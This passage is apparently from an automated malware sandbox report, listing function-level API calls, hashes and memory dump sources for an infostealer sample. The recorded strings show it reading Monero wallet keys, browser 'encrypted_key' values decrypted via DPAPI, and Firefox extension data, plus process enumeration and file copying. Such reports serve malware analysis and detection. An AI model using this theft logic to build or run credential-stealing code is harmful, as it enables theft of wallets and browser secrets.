                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 9babb4d917ce4774a153af0055f5af6ad8f6b286c30f2d0668705e2ef0415f4f
                        • Instruction ID: dfb5d57e737c437876dab8e52a6f189fe725482806ac16a665aa3705878cd096
                        • Opcode Fuzzy Hash: 9babb4d917ce4774a153af0055f5af6ad8f6b286c30f2d0668705e2ef0415f4f
                        • Instruction Fuzzy Hash: 74E15E72A11149DBDB15FBA4ED94EEE7338AF24210F508159E45773098EF386A4ECB70
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0100D481
                        • lstrlen.KERNEL32(00000000), ref: 0100D698
                        • lstrlen.KERNEL32(00000000), ref: 0100D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0100D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: fcc2742c9f15f8dcccfb09575ff7690bf222eb2479b9e6509b748654155f1c42
                        • Instruction ID: 9e869d8588138d838c1cecb154a1d7d70a688549bbdf3be58e4ee17da878637a
                        • Opcode Fuzzy Hash: fcc2742c9f15f8dcccfb09575ff7690bf222eb2479b9e6509b748654155f1c42
                        • Instruction Fuzzy Hash: 16916172A11149DBDB15FBA0DD94EEE7338AF24210F504169E587B7098EF386A4ECB70
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0100D801
                        • lstrlen.KERNEL32(00000000), ref: 0100D99F
                        • lstrlen.KERNEL32(00000000), ref: 0100D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0100DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: faf33eadd07fa2c7de5da9acc4111c9b802a3db1cf6b177b88d3fbe3d9697486
                        • Instruction ID: fffb86c01519c48965ed783eba2c3c9c81a7777fb96f21ba6d40f5d22ba7a45f
                        • Opcode Fuzzy Hash: faf33eadd07fa2c7de5da9acc4111c9b802a3db1cf6b177b88d3fbe3d9697486
                        • Instruction Fuzzy Hash: 89813276A51149DBDB15FBA4DD94EEE7339BF24210F404129F487A7098EF386A0ACB70
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,01021580,01020D92), ref: 0100F54C
                        • lstrlen.KERNEL32(00000000), ref: 0100F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: ca02497909e243b497a39fa7a26a51103d164a1eb9e0b4ac98ab5a582e2bcdaf
                        • Instruction ID: 0a962add7d40b147380244dfa03b06bf73a6aa75936d2162ceead752828e1a6e
                        • Opcode Fuzzy Hash: ca02497909e243b497a39fa7a26a51103d164a1eb9e0b4ac98ab5a582e2bcdaf
                        • Instruction Fuzzy Hash: 15514275E0114AEBDB04FBB4DD94DED7379AF64210F408528E847A7194EE386B0ECBA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 193dabab86f1aba60ce379931717561cfddd1c7ad0d0e9eafe2c197044007b59
                        • Instruction ID: 6f0e678a163b6b0f140ae0aa74d580ed2cd3a55c3f882a9d6c6af626efc2ecdd
                        • Opcode Fuzzy Hash: 193dabab86f1aba60ce379931717561cfddd1c7ad0d0e9eafe2c197044007b59
                        • Instruction Fuzzy Hash: CB4130B5E10209EBDB04EFA5D845AEEB7B8BF58314F008418E4567B248DB79A605CFA1
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 01009D39
                          • Part of subcall function 01009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009AEF
                          • Part of subcall function 01009AC0: LocalAlloc.KERNEL32(00000040,?,?,?,01004EEE,00000000,?), ref: 01009B01
                          • Part of subcall function 01009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009B2A
                          • Part of subcall function 01009AC0: LocalFree.KERNEL32(?,?,?,?,01004EEE,00000000,?), ref: 01009B3F
                          • Part of subcall function 01009B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 01009B84
                          • Part of subcall function 01009B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 01009BA3
                          • Part of subcall function 01009B60: LocalFree.KERNEL32(?), ref: 01009BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 35d71de8036078ac218ff0fc0c8c26fb9a90030a6a56c73bbd31ca7c6f0dbaff
                        • Instruction ID: 664cf9461820a0c5899ac02b4eaffe7ce169b083065e72c375e8114b2583d936
                        • Opcode Fuzzy Hash: 35d71de8036078ac218ff0fc0c8c26fb9a90030a6a56c73bbd31ca7c6f0dbaff
                        • Instruction Fuzzy Hash: 4A3181B5D0010DABEF05EFE8DC85AEFB7B8BF48304F144559EA55A7281E7349A04CBA1
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010205B7), ref: 010186CA
                        • Process32First.KERNEL32(?,00000128), ref: 010186DE
                        • Process32Next.KERNEL32(?,00000128), ref: 010186F3
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • CloseHandle.KERNEL32(?), ref: 01018761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 71a415d4f392409b74aeb1a84e8da3103b5c22ec59efe527e25df2584e4a92f5
                        • Instruction ID: a67608152f42ada780e1cd62c491cdc3009f59583382fd51468b218350e5047a
                        • Opcode Fuzzy Hash: 71a415d4f392409b74aeb1a84e8da3103b5c22ec59efe527e25df2584e4a92f5
                        • Instruction Fuzzy Hash: E4316B71A02259EBCB24EF55DC44FEEB778FB54710F004199E50AA7198DB386B45CFA0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01020E00,00000000,?), ref: 010179B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 010179B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,01020E00,00000000,?), ref: 010179C4
                        • wsprintfA.USER32 ref: 010179F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 275ddb44922dc98fd834d95e80e9b887b986ea5addd27c62808f293c08ddd9c6
                        • Instruction ID: b86148425e3e98c99c0206352b1f723a01599148b88b7e4a81a5e1ad0176d796
                        • Opcode Fuzzy Hash: 275ddb44922dc98fd834d95e80e9b887b986ea5addd27c62808f293c08ddd9c6
                        • Instruction Fuzzy Hash: EC113CB2944118ABDB14DFC9E949BBEB7F8FB4CB11F00421AF606A2284D3795940CBB0
                        APIs
                        • CreateFileA.KERNEL32(01013AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,01013AEE,?), ref: 010192FC
                        • GetFileSizeEx.KERNEL32(000000FF,01013AEE), ref: 01019319
                        • CloseHandle.KERNEL32(000000FF), ref: 01019327
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: e5b3340aa195a55045f5bc8507a3767110e9dc443ed6141577896a3e9fff2beb
                        • Instruction ID: e06e9dcce608b4a4f0eda0e60641af7010201b4a40a2ff762fb28660dd9dff1d
                        • Opcode Fuzzy Hash: e5b3340aa195a55045f5bc8507a3767110e9dc443ed6141577896a3e9fff2beb
                        • Instruction Fuzzy Hash: 52F04439E40204BBDB24DFB4EC59F9E77F9AB48710F10C154B552A72C4D67496018B40
                        APIs
                        • __getptd.LIBCMT ref: 0101C74E
                          • Part of subcall function 0101BF9F: __amsg_exit.LIBCMT ref: 0101BFAF
                        • __getptd.LIBCMT ref: 0101C765
                        • __amsg_exit.LIBCMT ref: 0101C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0101C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 1ab3dba2439071e73d138ae1f32ea3aa70c77b57e53edd80e7ed969c9cd28d47
                        • Instruction ID: da97d48406935c5f202cd96f7571c4fb1c602a5a7e344db3ad0f155758b93d69
                        • Opcode Fuzzy Hash: 1ab3dba2439071e73d138ae1f32ea3aa70c77b57e53edd80e7ed969c9cd28d47
                        • Instruction Fuzzy Hash: 00F0CD32A806129BE731BBB8550578D33A07F10724F20414CE0C4AB1C8CBAC98408B45
                        APIs
